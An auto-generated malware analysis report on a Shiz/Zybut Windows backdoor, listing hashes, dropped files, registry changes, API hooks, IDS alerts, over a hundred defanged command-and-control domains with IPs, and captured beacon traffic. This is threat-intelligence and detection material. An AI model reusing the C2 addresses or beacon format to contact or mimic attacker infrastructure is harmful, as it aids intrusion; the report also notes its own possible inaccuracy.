Gen.Heur.Zybut.1_2786cbabcd

by malwarelabrobot on November 21st, 2015 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Heur.Zybut.1 (B) (Emsisoft), Gen:Heur.Zybut.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 2786cbabcd57f37bc167ceb8a7c6de6c
SHA1: 8ab8c1f4da624c6863c18e4d0eaaa31155084cf8
SHA256: 9b885c3d036a2f94b2352322383e6799aecb038d539f48054b91cc393168f725
SSDeep: 6144:BgiD9CmFlaRUdduv9sZIUlfxryHfvau9hHoyrnETB2ebz:T9C3N2ZIUl4/njr8B2Yz
Size: 263680 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2008-01-10 22:31:36
Analyzed on: WindowsXP SP3 32-bit

Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1616

The Backdoor injects its code into the following process(es):

Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1616 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1616 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 57 EC 37 72 FE 84 78 F8 19 E4 84 17 62 F0 2E"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\jsvlax.exe_, \??\%WinDir%\apppatch\jsvlax.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEÃƒÂ¬XÃ‚Â£bÃƒâ‚¬Ã‚Â¸Ã‚Â¬qÃƒâ€žHFÃ¢â‚¬Â¡KÃƒÂ¶HÃƒÂªe?Ã‚Â²Ã‚ÂºoDÃ‚Â¬<Ã‚Â»Ã‚Â¹Ã…â€œÃ‚Â³Ã…â€™Q\Ã‚Â´ÃƒÂ²dÃ‚Â¼Ã…â€™Ã‚Â¤KÃƒÂ´1,Ã…Â $ÃƒÂ«Ã¢â‚¬ÂºÃƒâ€ºÃƒÅ’Ã‚Â«Ã¢â‚¬ÂÃ‚Â¹l}Ãƒâ€¹ {Ã…â€œzÃ…â€™ÃƒÂ´C%ÃƒÂ©[qÃƒÂ±l4ÃƒÂ¬;ÃƒÂ»Ã‚Â´[Ãƒâ€™#Ã‚Â»Ãƒâ€º:Ãƒâ€˜UÃ¢â‚¬Å¾Ã¢â‚¬Å¾Ãƒâ€Ã‚Â\Ã‚Â±Ã‚ÂªÃ‚Â²DÃ†â€™uÃ…â€œÃ‚Â¡ÃƒÅ“Ã‚Â¼);Ã‚Â¼\Ã†â€™tÃ‚Âµ2Ã¢â‚¬ÂkDÃƒÂ¹Ã¢â‚¬ÂaÃ¢â‚¬Â*Ã¢â‚¬ÂºcÃƒÂ¼$}SÃƒÂ´|ÃƒÂ«$Ã‚Â¤ÃƒÂ´{Ã‚Â¬qÃ‚Â³#sÃƒâ€¦ÃƒÂ¥\yuJÃƒâ€ºÃƒâ€¹uÃ‚Â©|ÃƒÂ¹Ã‚Â¢rKÃƒÂ£!$Ã¢â‚¬â„¢Ã¢â‚¬Â¹Ã¢â‚¬Â¹bÃ‚Â±ÃƒÆ’Ãƒâ€žÃ‚Â£ÃƒÂ£ÃƒÂÃ¢â‚¬Å¡Ã¢â‚¬Å“Ãƒâ€°UcdÃƒÂÃƒâ€žZÃ‚Â¡rÃ‚Â»ÃƒÂ´Ã¢â‚¬Â)Ãƒâ€ºÃ‚Â©Ã…Â ]Ã¢â‚¬Å“QlYÃƒâ€ºl]$$DÃ‚Â´Ã†â€™ÃƒÅ’Ã‚Â£Q$aÃ…â€™Ã¢â‚¬Å¡*Ã¢â€žÂ¢ÃƒÂ¼Ã¢â‚¬ÂºÃƒâ„¢ÃƒÂ³ÃƒÂÃƒÂ=ÃƒÂ©Ãƒâ€Ãƒâ€˜Ãƒâ€˜Ã¢â‚¬Â°Ã‚Â¬q9|ÃƒÂ¡ÃƒÂÃƒÂ¹Ã¢â‚¬â„¢Ã¢â‚¬ËœÃƒÂÃƒÂÃ‚Â©Ã…Â¡Ãƒâ€žR"

Dropped PE files

MD5	File path
91f2d8066a31de887e48e30545ce8816	c:\WINDOWS\AppPatch\jsvlax.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Backdoor installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Backdoor installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Backdoor installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Backdoor installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Backdoor installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Backdoor installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

Company Name: flouncey
Product Name: Canorousness
Product Version: 1.7.4.9
Legal Copyright: Knitter
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.8.7.1
File Description: africanthropus
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX1	4096	3381	3584	4.11995	5ca8758b50bde507e627becdf44a6897
.text	8192	18397	18432	4.10307	d3d0964c061dc60f7916c3972277c4a6
.b	28672	67171	2048	4.03977	0e8429d2ddee1efcf0d0af1ab7fab5ed
.rdata	98304	27457	1536	2.88669	68e2621575b0ea1d4e93cd3680b56226
.edata	126976	114375	76288	5.53033	0a8c26a3a29305690056c6cd49665ea4
.data	241664	285014	6656	5.15793	5567b42cb2577da1dff07341a38ec095
.edata	528384	192535	146432	5.53186	1434184dc08b2c631cb66d45420529d0
.tXJuJ	724992	633252	4608	0	b1e27aa018409de6bfd73f8afb883a65
.rsrc	1359872	2572	3072	3.70019	f55779d590a38be7408c663b2921f237

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
f331d7b25b956ea87d59ad294c0a9060
4790b969fbec046133f300fe459f8f0d

URLs

URL	IP
hxxp://cihunemyror.eu/login.php	192.42.116.41
hxxp://fodakyhijyv.eu/login.php	195.22.28.197
hxxp://lysovidacyx.eu/login.php	185.28.193.192
hxxp://digivehusyd.eu/login.php	69.195.129.70
hxxp://sso.anbtr.com/domain/vofozymufok.eu	195.22.28.222
hxxp://sso.anbtr.com/domain/nopegymozow.eu	195.22.28.222
hxxp://keraborigin.eu/login.php	54.201.30.58
hxxp://sso.anbtr.com/domain/fodakyhijyv.eu	195.22.28.222
hxxp://sso.anbtr.com/domain/marytymenok.eu	195.22.28.222
hxxp://fodakyhijyv.eu/519227042aaa4d45b3d8d04c6d6182c2	195.22.28.197
hxxp://fodakyhijyv.eu/90623dde15463e9fb45001ad5063db65	195.22.28.197
hxxp://sso.anbtr.com/domain/gatedyhavyd.eu	195.22.28.222
hxxp://sso.anbtr.com/domain/jewuqyjywyv.eu	195.22.28.222
hxxp://fodakyhijyv.eu/4abc123f5bc1fe014bbeb686d9306960	195.22.28.197
hxxp://fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40	195.22.28.197
hxxp://ww62.galokusemus.eu/	54.72.9.51
hxxp://sso.anbtr.com/domain/qeqinuqypoq.eu	195.22.28.222
hxxp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525	54.86.84.196
hxxp://sso.anbtr.com/domain/kemocujufys.eu	195.22.28.222
hxxp://fodakyhijyv.eu/daf1516824a145639bf41787e2765d81	195.22.28.197
hxxp://sso.anbtr.com/domain/rynazuqihoj.eu	195.22.28.222
hxxp://ww92.dimutobihom.eu/	208.91.197.245
hxxp://sso.anbtr.com/domain/ciliqikytec.eu	195.22.28.222
hxxp://fodakyhijyv.eu/bd3d82839c544969cd7e5b6b151fa69e	195.22.28.197
hxxp://sso.anbtr.com/domain/tucyguqaciq.eu	195.22.28.222
hxxp://sso.anbtr.com/domain/lyvejujolec.eu	195.22.28.222
hxxp://fodakyhijyv.eu/1acef55da687a834a563e6c7f72341c6	195.22.28.197
hxxp://fodakyhijyv.eu/f2c2596452aa9379694886959d3b2888	195.22.28.197
hxxp://fodakyhijyv.eu/f89965e1c0417ff83998ff3762e77e38	195.22.28.197
hxxp://fodakyhijyv.eu/d1e2832667be3ac8af2587e3c0958424	195.22.28.197
hxxp://fodakyhijyv.eu/be7c0ab0ac1acf15c755867799d818c8	195.22.28.197
hxxp://xuxusujenes.eu/login.php	208.100.26.234
hxxp://fodakyhijyv.eu/71c55851e5901a95263b027885fa0411	195.22.28.197
hxxp://qekenilacap.eu/login.php
hxxp://sso.anbtr.com/domain/nojejecebuw.eu	195.22.28.222
hxxp://fodakyhijyv.eu/367a5a5db4f631d0cc1ad3c79b85b63a	195.22.28.197
hxxp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40	195.22.28.198
hxxp://ww62.pupujeguper.eu/	54.72.9.51
hxxp://ww62.digusebyvad.eu/	54.72.9.51
hxxp://ganycyhywek.eu/login.php	185.28.193.192
hxxp://xuqufyduras.eu/login.php	185.28.193.192
hxxp://nopegymozow.eu/login.php	195.22.28.196
hxxp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65	195.22.28.197
hxxp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38	195.22.28.197
hxxp://qeqinuqypoq.eu/login.php	195.22.28.199
hxxp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81	195.22.28.196
hxxp://ww92.masawocipel.eu/	208.91.197.245
hxxp://ww92.qetuluvolos.eu/	208.91.197.245
hxxp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e	195.22.28.199
hxxp://marytymenok.eu/login.php	195.22.28.199
hxxp://lykemujebeq.eu/login.php	185.28.193.192
hxxp://vofozymufok.eu/login.php	195.22.28.196
hxxp://ww62.xuqufyduras.eu/	54.72.9.51
hxxp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960	195.22.28.199
hxxp://ryhuzilywax.eu/login.php	185.28.193.192
hxxp://dimutobihom.eu/login.php	185.28.193.192
hxxp://ww92.qexofyqihid.eu/	208.91.197.245
hxxp://ww92.ryleryqacic.eu/	208.91.197.245
hxxp://tufecagemyl.eu/login.php	185.28.193.192
hxxp://qebahilojam.eu/login.php	185.28.193.192
hxxp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2	195.22.28.198
hxxp://novomyfexij.eu/login.php	185.28.193.192
hxxp://jeluganusog.eu/login.php	185.28.193.192
hxxp://mamixikusah.eu/login.php	185.28.193.192
hxxp://ww92.qekikyvutic.eu/	208.91.197.245
hxxp://ww62.puregivytoh.eu/	54.72.9.51
hxxp://rynazuqihoj.eu/login.php	195.22.28.197
hxxp://ww62.lykemujebeq.eu/	54.72.9.51
hxxp://norumikemem.eu/login.php	185.28.193.192
hxxp://ww62.norumikemem.eu/	54.72.9.51
hxxp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411	195.22.28.197
hxxp://ww62.nozulufynax.eu/	54.72.9.51
hxxp://vocakemenir.eu/login.php	185.28.193.192
hxxp://qexofyqihid.eu/login.php	185.28.193.192
hxxp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8	195.22.28.197
hxxp://nojejecebuw.eu/login.php	195.22.28.198
hxxp://kemocujufys.eu/login.php	195.22.28.197
hxxp://ww92.jeluganusog.eu/	208.91.197.245
hxxp://ww62.vocakemenir.eu/	54.72.9.51
hxxp://pupujeguper.eu/login.php	185.28.193.192
hxxp://ciliqikytec.eu/login.php	195.22.28.198
hxxp://digusebyvad.eu/login.php	185.28.193.192
hxxp://qetuluvolos.eu/login.php	185.28.193.192
hxxp://masawocipel.eu/login.php	185.28.193.192
hxxp://lyvejujolec.eu/login.php	195.22.28.198
hxxp://ww92.mamixikusah.eu/	208.91.197.245
hxxp://ww62.ganycyhywek.eu/	54.72.9.51
hxxp://ww92.kevedorozup.eu/	208.91.197.245
hxxp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6	195.22.28.198
hxxp://jewuqyjywyv.eu/login.php	195.22.28.197
hxxp://qekikyvutic.eu/login.php	185.28.193.192
hxxp://tucyguqaciq.eu/login.php	195.22.28.196
hxxp://galokusemus.eu/login.php	185.28.193.192
hxxp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a	195.22.28.199
hxxp://kevedorozup.eu/login.php	185.28.193.192
hxxp://ww92.novomyfexij.eu/	208.91.197.245
hxxp://nozulufynax.eu/login.php	185.28.193.192
hxxp://ww92.rynyhipexon.eu/	208.91.197.245
hxxp://lyvufixyvet.eu/login.php	185.28.193.192
hxxp://xugiqonenuz.eu/login.php	69.195.129.70
hxxp://puregivytoh.eu/login.php	185.28.193.192
hxxp://rynyhipexon.eu/login.php	185.28.193.192
hxxp://ww92.tufecagemyl.eu/	208.91.197.245
hxxp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424	195.22.28.196
hxxp://ww62.lyvufixyvet.eu/	54.72.9.51
hxxp://ryleryqacic.eu/login.php	185.28.193.192
hxxp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888	195.22.28.199
hxxp://ww62.qebahilojam.eu/	54.72.9.51
hxxp://gatedyhavyd.eu/login.php	195.22.28.196
puvybivihox.eu	185.28.193.192
ww92.xuqufyduras.eu	208.91.197.245
ww92.ryhuzilywax.eu	208.91.197.245
ww62.ryhuzilywax.eu	54.72.9.51
www.bing.com	204.79.197.200
ww62.qetuluvolos.eu

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET TROJAN Possible Compromised Host Sinkhole Cookie Value Snkz
ET TROJAN Known Sinkhole Response Header

Traffic

GET /domain/fodakyhijyv.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu

Location: hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40

3e..Go hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/marytymenok.eu

Set-Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tufecagemyl.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:35 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.tufecagemyl.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.tufecagemy
l.eu..Vary: Accept-Encoding..

GET /domain/nojejecebuw.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu

Location: hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a

3e..Go hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a..0.
.

GET /domain/qeqinuqypoq.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu

Location: hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e

3e..Go hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e..0.
.

GET /be7c0ab0ac1acf15c755867799d818c8 HTTP/1.1

Host: xsso.lyvejujolec.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
19..Landed lyvejujolec.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/tucyguqaciq.eu

Set-Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET /daf1516824a145639bf41787e2765d81 HTTP/1.1

Host: xsso.gatedyhavyd.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
19..Landed gatedyhavyd.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:08 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.....


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:08 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20
 Nov 2015 09:09:08 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-E
ncoding..Content-Length: 287..Content-Type: text/html; charset=iso-885
9-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /login.php was not found on this server.</p>.<hr>.<ad
dress>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</a
ddress>.</body></html>...

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocakemenir.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:40 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.vocakemenir.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.vocakemeni
r.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/rynazuqihoj.eu

Set-Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mamixikusah.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:35 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.mamixikusah.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.mamixikusa
h.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Nov 2015 09:10:30 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;......


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Nov 2015 09:10:30 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 
20 Nov 2015 09:10:30 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome 
